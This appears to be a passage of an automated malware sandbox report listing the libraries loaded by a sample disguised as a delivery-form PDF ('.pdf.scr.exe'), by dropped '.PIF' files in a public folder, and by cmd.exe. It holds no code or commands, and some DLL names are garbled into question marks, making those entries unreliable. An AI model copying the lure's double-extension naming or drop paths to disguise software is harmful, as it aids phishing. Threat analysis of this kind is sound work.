                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Users\Public\Libraries\dxobknwL.pifSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: msimg32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: version.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: url.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ieframe.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: wkscli.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: smartscreenps.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ??????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: tquery.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppwmi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: slc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppcext.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: winscard.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: devobj.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: msimg32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: version.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: url.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ieframe.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: wkscli.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: smartscreenps.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ??????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: tquery.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppwmi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: slc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppcext.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: winscard.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: devobj.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: wininet.dllJump to behavior
